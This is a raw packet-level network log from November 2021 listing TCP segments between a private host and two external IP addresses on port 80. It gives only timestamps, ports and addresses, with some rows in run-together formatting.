                                                            Nov 25, 2021 18:08:42.015626907 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:42.035528898 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:42.035784006 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:42.041954994 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:42.042180061 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:42.043267965 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:42.043312073 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:42.043364048 CET4916580192.168.2.2237.0.9.166
Timestamp                            Src Port  Dst Port  Source IP     Dest IP
Nov 25, 2021 18:08:42.046395063 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.063548088 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.063764095 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.069749117 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.069916964 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.074122906 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.074256897 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.097703934 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.097950935 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.101795912 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.102004051 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.125699043 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.125936985 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.129601955 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.129772902 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.153815985 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.154047012 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.251650095 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.251724005 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.279350996 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.279583931 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.307216883 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.307255983 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.307493925 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.309775114 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.335542917 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.335783958 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.337424994 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.337558985 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.363413095 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.363600016 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.365031004 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.365125895 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.391300917 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.391354084 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.391526937 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.392575026 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.392668009 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.419348001 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.419698000 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.420141935 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.420238972 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.447426081 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.447535038 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.447540998 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.447607040 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.447894096 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.447981119 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.467650890 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.467767000 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.475584984 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.475702047 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.503371954 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.503421068 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.503593922 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.503623962 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.531239986 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.531407118 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.532967091 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.533049107 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.560646057 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.560879946 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.588589907 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.588874102 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.607637882 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.609442949 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.616594076 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.616822958 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.637170076 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.637423038 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.644638062 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.644953966 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.672651052 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.672691107 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.673001051 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.673057079 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.700628996 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.700898886 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.728637934 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.728944063 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.756566048 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.756671906 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.784241915 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.784276009 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.784356117 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.812318087 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.812355042 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.812622070 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.840284109 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.840323925 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.840336084 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.840348959 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.840552092 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.868263006 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.868297100 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.868309975 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.868323088 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.868618011 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.896327019 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.896363020 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.896377087 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.896424055 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.896486044 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.896512985 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.924228907 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.924264908 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.924554110 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.952276945 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.952311039 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.952498913 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.952533007 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.971636057 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.971961975 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.982312918 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.982487917 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:42.999572039 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:42.999660969 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.010047913 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.010179996 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.027240038 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.027271032 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.027352095 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.037770033 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.037825108 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.055001020 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.055030107 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.055083036 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.055103064 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.065435886 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.065498114 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.082658052 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.082726955 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.093538046 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.093626976 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.110351086 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.110421896 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.121201992 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.121287107 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.148921967 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.148997068 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.176647902 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.176748037 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.204303026 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.204335928 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.204392910 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.232342005 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.232373953 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.232429028 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.260071993 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.260104895 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.260118961 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.260339022 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.262141943 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.288137913 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.288328886 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.311615944 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.311707020 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.315920115 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.316004038 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.339319944 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.339409113 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.343497992 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.343564987 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.367023945 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.367063046 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.367171049 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.371428013 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.371511936 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.394747019 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.394781113 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.394964933 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.399175882 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.399292946 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.422636032 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.422672987 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.422868967 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.426903963 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.427047014 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.450521946 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.450571060 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.450669050 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.454917908 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.454955101 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.455111027 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.478254080 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.478293896 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.478362083 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.482573032 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.482604027 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.482678890 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.505887032 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.506123066 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.510339975 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.510371923 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.510420084 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.510446072 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.533845901 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.534113884 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.537928104 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.538043022 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.561870098 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.562048912 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.565574884 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.565717936 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.589807987 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.589940071 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.593369007 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.593465090 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.617558002 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.617716074 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.622366905 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.622493029 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.645390034 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.645417929 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.645581007 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.645602942 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.649967909 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.650085926 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.677685976 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.677896976 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.705916882 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.706146955 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.733773947 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.733803988 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.734006882 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.761596918 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.761626959 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.761826038 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.789365053 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.789408922 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:43.789534092 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:43.789561033 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.051698923 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.051959038 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.079528093 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.079715967 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.107410908 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.107620001 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.135242939 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.135270119 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.135436058 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.163940907 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.163966894 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.164203882 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.192071915 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.192102909 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.192348957 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.219860077 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.219887972 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.219899893 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.219912052 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.220154047 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.247689962 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.247720003 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.247731924 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.247745037 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.248065948 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.275541067 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.275574923 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.275589943 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.275603056 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.275794029 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.303333044 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.303376913 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.303389072 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.303400993 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.303653002 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.303698063 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.303704977 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.303709030 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.331322908 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.331350088 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.331362009 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.331511974 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.331547976 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.331553936 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.359025955 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.359292984 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.360531092 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.360551119 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.360658884 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.360683918 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.386936903 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.387109995 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.388048887 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.388144970 CET  49165     80        192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:44.407561064 CET  80        49165     37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:44.407804012 CET  49165     80        192.168.2.22  37.0.9.166
                                                            Nov 25, 2021 18:08:44.415594101 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.415684938 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.435270071 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.435326099 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.443090916 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.443114042 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.443145990 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.443166971 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.462941885 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.463006973 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.470788002 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.470961094 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.490593910 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.490789890 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.498509884 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.498605013 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.518291950 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.518362045 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.526201010 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.526313066 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.545850992 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.545912027 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.553791046 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.553865910 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:45.613758087 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:10:31.967025042 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:31.987112045 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:31.987190008 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:31.987536907 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:32.007673025 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:32.106173992 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:32.106223106 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:32.106412888 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:32.106462955 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:32.129015923 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.215019941 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.236938953 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.240163088 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.240250111 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.264972925 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.357868910 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.357903957 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.358093977 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.358259916 CET4916880192.168.2.2234.102.136.180
